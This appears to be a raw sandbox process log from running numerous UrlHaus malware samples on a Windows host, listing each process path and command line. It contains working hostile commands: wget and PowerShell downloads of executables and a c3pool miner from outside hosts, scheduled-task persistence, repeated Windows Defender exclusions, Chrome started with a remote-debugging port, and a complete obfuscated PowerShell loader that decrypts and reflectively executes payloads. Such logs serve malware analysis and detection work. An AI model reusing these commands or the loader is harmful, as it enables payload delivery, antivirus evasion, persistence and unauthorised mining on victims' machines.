C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 812
C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe
"C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1968 -ip 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 832
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1968 -ip 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 832
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1968 -ip 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 872
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1968 -ip 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1020
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5436 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1968 -ip 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1048
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5436 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
C:\Windows\SYSTEM32\cmd.exe
cmd
C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe
"C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4472 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"
C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe
"C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe"
C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe" /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={DB24EDD3-9920-5D5F-FBBE-8E743F7486C1}&lang=zh-CN&browser=2&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver
C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f
C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1968 -ip 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1552
C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe
"C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe"
C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping …-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgaW5zdGFsbF90aW1lX21zPSIxMjIzIi8-PC9hcHA-PC9yZXF1ZXN0Pg
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1968 -ip 1968
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={DB24EDD3-9920-5D5F-FBBE-8E743F7486C1}&lang=zh-CN&browser=2&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty" /installsource taggedmi /sessionid "{2F09D49A-D224-44E5-9560-BB94460123D0}"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1556
C:\Windows\system32\schtasks.exe
SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
C:\Users\Admin\Downloads\UrlHausFiles\boot.exe
"C:\Users\Admin\Downloads\UrlHausFiles\boot.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6E26.tmp\6E27.tmp\6E28.bat C:\Users\Admin\Downloads\UrlHausFiles\boot.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1968 -ip 1968
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Roaming\wget.exe
wget "http://quanlyphongnet.com/net/Google Chrome.exe" -O "Google Chrome.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1652
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1968 -ip 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1968 -ip 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1732
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1968 -ip 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1644
C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe
"C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe"
C:\Users\Admin\Downloads\UrlHausFiles\SharpHound.exe
"C:\Users\Admin\Downloads\UrlHausFiles\SharpHound.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1968 -ip 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1868
C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe
"C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe"
C:\Users\Admin\AppData\Roaming\wget.exe
wget "http://quanlyphongnet.com/net/Coc Coc.exe" -O "Coc Coc.exe"
C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe
"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"
C:\Users\Admin\Downloads\UrlHausFiles\test28.exe
"C:\Users\Admin\Downloads\UrlHausFiles\test28.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\b.ps1"
C:\Users\Admin\Downloads\UrlHausFiles\random.exe
"C:\Users\Admin\Downloads\UrlHausFiles\random.exe"
C:\Users\Admin\Downloads\UrlHausFiles\award.pdf.exe
"C:\Users\Admin\Downloads\UrlHausFiles\award.pdf.exe"
C:\Windows\system32\schtasks.exe
SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe
"C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe"
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
C:\Users\Admin\Downloads\UrlHausFiles\msf.exe
"C:\Users\Admin\Downloads\UrlHausFiles\msf.exe"
C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe
"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"
C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat
"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"
C:\Users\Admin\AppData\Local\palladiums\translucently.exe
"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"
C:\Users\Admin\Downloads\UrlHausFiles\wwbizsrvs.exe
"C:\Users\Admin\Downloads\UrlHausFiles\wwbizsrvs.exe"
C:\Users\Admin\Downloads\UrlHausFiles\def.exe
"C:\Users\Admin\Downloads\UrlHausFiles\def.exe"
C:\Windows\SysWOW64\svchost.exe
"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5716 -ip 5716
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 700
C:\Users\Admin\Downloads\UrlHausFiles\TORRENTOLD-1.exe
"C:\Users\Admin\Downloads\UrlHausFiles\TORRENTOLD-1.exe"
C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe
"C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4748 -ip 4748
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4748 -s 732
C:\Users\Admin\Downloads\UrlHausFiles\nguyentri38.exe
"C:\Users\Admin\Downloads\UrlHausFiles\nguyentri38.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D30A.tmp\D30B.tmp\D30C.bat C:\Users\Admin\Downloads\UrlHausFiles\nguyentri38.exe"
C:\Users\Admin\AppData\Roaming\Bypass.exe
Bypass.exe
C:\Users\Admin\AppData\Local\Temp\Defender.exe
"C:\Users\Admin\AppData\Local\Temp\Defender.exe" /D
C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\131.0.6778.86_chrome_installer.exe
"C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\131.0.6778.86_chrome_installer.exe" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\guiD7FE.tmp"
C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe
"C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\CHROME.PACKED.7Z" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\guiD7FE.tmp"
C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe
"C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0x27c,0x280,0x284,0x258,0x288,0x7ff7f4aa5d68,0x7ff7f4aa5d74,0x7ff7f4aa5d80
C:\Users\Admin\Downloads\UrlHausFiles\key.exe
"C:\Users\Admin\Downloads\UrlHausFiles\key.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1792 -ip 1792
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1968 -ip 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1572
C:\Users\Admin\AppData\Local\Temp\10000321101\stail.exe
"C:\Users\Admin\AppData\Local\Temp\10000321101\stail.exe"
C:\Users\Admin\AppData\Local\Temp\is-FP5B3.tmp\stail.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FP5B3.tmp\stail.tmp" /SL5="$1501DA,3886989,54272,C:\Users\Admin\AppData\Local\Temp\10000321101\stail.exe"
C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" pause coder_media_11281
C:\Users\Admin\AppData\Local\Coder Media 1.7.55\codermedia.exe
"C:\Users\Admin\AppData\Local\Coder Media 1.7.55\codermedia.exe" -i
C:\Users\Admin\Downloads\UrlHausFiles\7z.exe
"C:\Users\Admin\Downloads\UrlHausFiles\7z.exe"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 pause coder_media_11281
C:\Users\Admin\Downloads\UrlHausFiles\Autoupdate.exe
"C:\Users\Admin\Downloads\UrlHausFiles\Autoupdate.exe"
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe
"C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe" --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1
C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe
"C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0x274,0x278,0x27c,0x250,0x280,0x7ff7f4aa5d68,0x7ff7f4aa5d74,0x7ff7f4aa5d80
C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe
"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"
C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe
"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe" -service -lunch
C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe
"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"
C:\Users\Admin\Downloads\UrlHausFiles\win.exe
"C:\Users\Admin\Downloads\UrlHausFiles\win.exe"
C:\Users\Admin\Downloads\UrlHausFiles\ew.exe
"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"
C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe
"C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe"
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\UrlHausFiles\ONHQNHFT.msi"
C:\Windows\SYSTEM32\rundll32.exe
rundll32.exe "C:\ProgramData\AMMYY\aa_nts.dll",run
C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.new.exe
"C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.new.exe" /update "C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe
"C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe" /delete "C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.new.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Users\Admin\Downloads\UrlHausFiles\System.exe
"C:\Users\Admin\Downloads\UrlHausFiles\System.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\10000110280\min1_Melted.cmd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\10000110280\min1_Melted.cmd';$lAeq='GfZBCetCfZBCurfZBCrefZBCnfZBCtfZBCPrfZBCocfZBCefZBCsfZBCsfZBC'.Replace('fZBC', ''),'MaiPrpmnMoPrpmdPrpmulPrpmePrpm'.Replace('Prpm', ''),'CrIgJgeatIgJgeIgJgDeIgJgcIgJgryIgJgpIgJgtoIgJgrIgJg'.Replace('IgJg', ''),'EJqHmntJqHmrJqHmyPoJqHmintJqHm'.Replace('JqHm', ''),'EleDBwrmeDBwrntADBwrtDBwr'.Replace('DBwr', ''),'ChaFGFHnFGFHgFGFHeEFGFHxtFGFHeFGFHnsiFGFHonFGFH'.Replace('FGFH', ''),'TrFaEMansFaEMfoFaEMrmFaEMFinFaEMalBFaEMlFaEMockFaEM'.Replace('FaEM', ''),'IpACXnvpACXokpACXepACX'.Replace('pACX', ''),'Sssrbplissrbtssrb'.Replace('ssrb', ''),'DVGtReVGtRcomVGtRpreVGtRssVGtR'.Replace('VGtR', ''),'FroomPomBoomPasoomPe6oomP4SoomPtroomPingoomP'.Replace('oomP', ''),'ReaafWIdLafWIinafWIeafWIsafWI'.Replace('afWI', ''),'LIdMHoaIdMHdIdMH'.Replace('IdMH', ''),'CBGdXopBGdXyBGdXToBGdX'.Replace('BGdX', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($lAeq[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function PvrJj($TpxZW){$NbCzo=[System.Security.Cryptography.Aes]::Create();$NbCzo.Mode=[System.Security.Cryptography.CipherMode]::CBC;$NbCzo.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NbCzo.Key=[System.Convert]::($lAeq[10])('wn6tmbO/rOORgxj74qEsSdU2WhE4KPXIqhTJPDz2aPY=');$NbCzo.IV=[System.Convert]::($lAeq[10])('gHqzXB7DsEnzxXPGoUcHcg==');$PddqI=$NbCzo.($lAeq[2])();$ySKdP=$PddqI.($lAeq[6])($TpxZW,0,$TpxZW.Length);$PddqI.Dispose();$NbCzo.Dispose();$ySKdP;}function rEEVf($TpxZW){$QUakK=New-Object System.IO.MemoryStream(,$TpxZW);$zUBgT=New-Object System.IO.MemoryStream;$PwRDy=New-Object System.IO.Compression.GZipStream($QUakK,[IO.Compression.CompressionMode]::($lAeq[9]));$PwRDy.($lAeq[13])($zUBgT);$PwRDy.Dispose();$QUakK.Dispose();$zUBgT.Dispose();$zUBgT.ToArray();}$lkrNY=[System.IO.File]::($lAeq[11])([Console]::Title);$aZZTu=rEEVf (PvrJj ([Convert]::($lAeq[10])([System.Linq.Enumerable]::($lAeq[4])($lkrNY, 
5).Substring(2))));$cSjRs=rEEVf (PvrJj ([Convert]::($lAeq[10])([System.Linq.Enumerable]::($lAeq[4])($lkrNY, 6).Substring(2))));[System.Reflection.Assembly]::($lAeq[12])([byte[]]$cSjRs).($lAeq[3]).($lAeq[7])($null,$null);[System.Reflection.Assembly]::($lAeq[12])([byte[]]$aZZTu).($lAeq[3]).($lAeq[7])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Users\Admin\AppData\Local\Temp\._cache_System.exe
"C:\Users\Admin\AppData\Local\Temp\._cache_System.exe"
C:\ProgramData\Synaptics\Synaptics.exe
"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
C:\Users\Admin\Downloads\UrlHausFiles\bp.exe
"C:\Users\Admin\Downloads\UrlHausFiles\bp.exe"
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BAFIEGIECGCB" & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\._cache_System.exe'
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe
"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\c3pool7.bat" "
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Users\Admin\AppData\Roaming\wget.exe
wget "http://quanlyphongnet.com/net/run.exe" -O "run.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/WinRing0x64.sys', 'C:\Users\Admin\c3pool\WinRing0x64.sys')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe'
C:\Users\Admin\AppData\Roaming\wget.exe
wget "http://quanlyphongnet.com/net/run2.exe" -O "run2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/config.json', 'C:\Users\Admin\c3pool\config.json')"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffe9bf0fd08,0x7ffe9bf0fd14,0x7ffe9bf0fd20
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1968 -ip 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1976
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations=is-enterprise-managed=no --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2092,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=2068 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=2016,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=2228 /prefetch:3
C:\Program Files\Google\Chrome\Application\131.0.6778.86\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\131.0.6778.86\elevation_service.exe"
C:\Users\Admin\AppData\Roaming\run.exe
run.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=2372,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
